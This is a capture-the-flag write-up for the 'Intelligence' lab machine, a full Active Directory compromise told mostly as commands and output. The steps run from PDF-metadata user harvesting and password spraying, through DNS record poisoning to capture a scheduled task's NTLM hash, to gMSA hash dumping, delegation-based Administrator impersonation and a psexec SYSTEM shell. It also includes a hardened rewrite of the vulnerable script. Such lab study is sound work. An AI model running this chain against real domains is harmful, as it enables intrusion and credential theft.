HTB-Intelligence

Intelligence

NMAP

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-07-30 12:05:46Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-30T11:00:26
| Not valid after: 2023-07-30T11:00:26
| MD5: 25ff 5c68 a2e6 3ca9 dcf3 9b41 3ae9 6655
| SHA-1: 5489 e5d4 27b3 2093 dc45 4f62 f15b 3fbe 7565 2de0
|_ssl-date: 2022-07-30T12:07:18+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-30T11:00:26
| Not valid after: 2023-07-30T11:00:26
| MD5: 25ff 5c68 a2e6 3ca9 dcf3 9b41 3ae9 6655
| SHA-1: 5489 e5d4 27b3 2093 dc45 4f62 f15b 3fbe 7565 2de0
|_ssl-date: 2022-07-30T12:07:19+00:00; +7h00m00s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49711/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62578/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-07-30T12:06:38
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 11589/tcp): CLEAN (Timeout)
| Check 2 (port 4953/tcp): CLEAN (Timeout)
| Check 3 (port 35882/udp): CLEAN (Timeout)
| Check 4 (port 21343/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Enumeration

Visiting the home page reveals two PDFs:

http://10.10.10.248/documents/2020-12-15-upload.pdf
http://10.10.10.248/documents/2020-01-01-upload.pdf
  • exiftool: inspect the PDF metadata

    exiftool 2020-12-15-upload.pdf

    ExifTool Version Number : 12.44
    File Name : 2020-12-15-upload.pdf
    Directory : .
    File Size : 27 kB
    File Modification Date/Time : 2021:04:01 13:00:00-04:00
    File Access Date/Time : 2022:08:01 23:40:54-04:00
    File Inode Change Date/Time : 2022:08:01 23:40:54-04:00
    File Permissions : -rw-r--r--
    File Type : PDF
    File Type Extension : pdf
    MIME Type : application/pdf
    PDF Version : 1.5
    Linearized : No
    Page Count : 1
    Creator : Jose.Williams
exiftool 2020-01-01-upload.pdf

ExifTool Version Number : 12.44
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2022:08:01 23:40:46-04:00
File Inode Change Date/Time : 2022:08:01 23:40:46-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
  • Brutesploit: generate a date wordlist

    ./datelist -b 2020-01-01 -e 2022-01-01 -f yyyymmdd -o date_wordlist.txt -s '-'
  • ffuf: fuzz the date in the upload filename

    ffuf -c -w date_wordlist.txt -u http://10.10.10.248/documents/FUZZ-upload.pdf

  • Open every PDF that exists; the 06-04 document contains a password

    http://10.10.10.248/documents/2020-06-04-upload.pdf

  • Collect user accounts

    date.py: download all the PDFs

    import requests

    # date.txt holds the candidate dates from the wordlist, one per line
    with open('date.txt', 'r') as f:
        dates = f.read().split()

    for date in dates:
        url = "http://10.10.10.248/documents/" + date + "-upload.pdf"
        print(url)
        resp = requests.get(url)
        # Only dates that actually have an upload return 200; the rest are 404
        if resp.status_code == 200:
            with open(date + "-upload.pdf", "wb") as out:
                out.write(resp.content)
  • exiftool: gather every Creator value into a user list

    exiftool * | grep Creator | awk '{print $3}' > user.txt

  • Password spraying

    crackmapexec -t 64 smb -u user.txt -p 'NewIntelligenceCorpUser9876' -d 'intelligence.htb' 10.10.10.248

  • Valid credentials

    intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
  • cme: check SMB share permissions

    crackmapexec -t 64 smb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --shares 10.10.10.248
  • Download downdetector.ps1 from the IT share

    # Check web server status. Scheduled to run every 5min
    Import-Module ActiveDirectory
    # Every record in the AD-integrated zone whose name begins with "web" is probed
    foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
        try {
            # -UseDefaultCredentials sends the scheduled task's own credentials to whatever host the record names
            $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
            # The file as found on the share reads "if(.StatusCode -ne 200)", which fails instead of testing the response and is swallowed by the empty catch below
            if($request.StatusCode -ne 200) {
                Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
            }
        } catch {}
    }
  • dnstool: add a fake web* host to the DNS zone

    The script visits every DNS record whose name begins with "web", authenticating with the scheduled task's credentials, and sends a mail about that record if the response is not 200. Because authenticated domain users can create records in the AD-integrated zone by default, Tiffany.Molina's account is enough to add one that points at our listener.

    python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -d 10.10.14.13 -r 'webccc.intelligence.htb' 10.10.10.248
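A hardened rewrite of downdetector.ps1, added here as an example and not a script from the box or this writeup: it monitors a reviewed host list instead of trusting every web* record in the zone, resolves and range-checks each host before contacting it, never sends credentials to the probed server, and tests the status code correctly. The host names, address prefix and SMTP relay are constructed values.

```powershell
# Hardened variant of downdetector.ps1 (added example, not the script from the share).
# Root cause on this box: the original probed every "web*" record in the AD-integrated
# zone with -UseDefaultCredentials, so a record that any domain user can add was enough
# to make the scheduled task authenticate to an attacker's listener.

# Assumption: the monitored hosts are a fixed, reviewed list rather than whatever
# currently matches web* in DNS. Constructed names.
$Monitored = @('web01.intelligence.htb', 'web02.intelligence.htb')

# Constructed values: the only address range the web servers live in, and the mail relay.
$AllowedPrefix = '10.10.10.'
$SmtpServer    = 'mail.intelligence.htb'
$Mailbox       = 'Ted.Graves@intelligence.htb'

function Send-DownAlert([string]$HostName, [string]$Reason) {
    Send-MailMessage -SmtpServer $SmtpServer -From $Mailbox -To $Mailbox `
        -Subject "Host: $HostName is down" -Body $Reason
}

foreach ($hostName in $Monitored) {
    # Resolve first and refuse to contact anything outside the expected range.
    $answer = Resolve-DnsName -Name $hostName -Type A -ErrorAction SilentlyContinue |
              Where-Object { $_.QueryType -eq 'A' } | Select-Object -First 1
    if (-not $answer -or -not $answer.IPAddress.StartsWith($AllowedPrefix)) {
        Write-Warning "$hostName did not resolve into $AllowedPrefix; not contacting it"
        continue
    }
    try {
        # Anonymous request with a timeout: no credentials are ever sent to the target.
        $request = Invoke-WebRequest -Uri "http://$hostName" -UseBasicParsing -TimeoutSec 10
        if ($request.StatusCode -ne 200) {
            Send-DownAlert $hostName "HTTP $($request.StatusCode)"
        }
    } catch {
        # Connection failures and HTTP errors thrown by Invoke-WebRequest count as down
        # as well; the original swallowed them silently.
        Send-DownAlert $hostName $_.Exception.Message
    }
}
```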

  • responder: capture the NetNTLMv2 hash the script sends

    responder -I tun0 -A

  • hashcat: crack the NetNTLMv2 hash

    hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt

    # Ted.Graves:Mr.Teddy

  • Re-check the PDFs for further information

    http://10.10.10.248/documents/2020-12-30-upload.pdf

  • BloodHound analysis

    Shortest path to svc_int

    Path from svc_int to the DC

  • GMSA Dumper

    python3 gMSADumper.py -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy' -l 10.10.10.248

    svc_int$:::ee6ba16bad56e4fd9cc2a4156710cd2d

  • crackmapexec winrm

    crackmapexec winrm 10.10.10.248 -u 'svc_int$' -H 'ee6ba16bad56e4fd9cc2a4156710cd2d'

  • pywerview: inspect the svc_int machine account's services

    python3 ./pywerview.py get-netcomputer -u Ted.Graves -p Mr.Teddy -w intelligence.htb --computername svc_int.intelligence.htb -t 10.10.10.248 --full-data

    # WWW/dc.intelligence.htb

  • Generate a silver ticket

    apt install chrony
    timedatectl set-ntp true
    ntpdate 10.10.10.248

    # impacket 0.9.24
    python3 getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes :ee6ba16bad56e4fd9cc2a4156710cd2d

Shell (SYSTEM)

export KRB5CCNAME=Administrator.ccache

python3 psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb -target-ip 10.10.10.248

https://luoming1995125.github.io/2022/09/20/HTB-Intelligence/
Author: Peter Luo
Published: September 20, 2022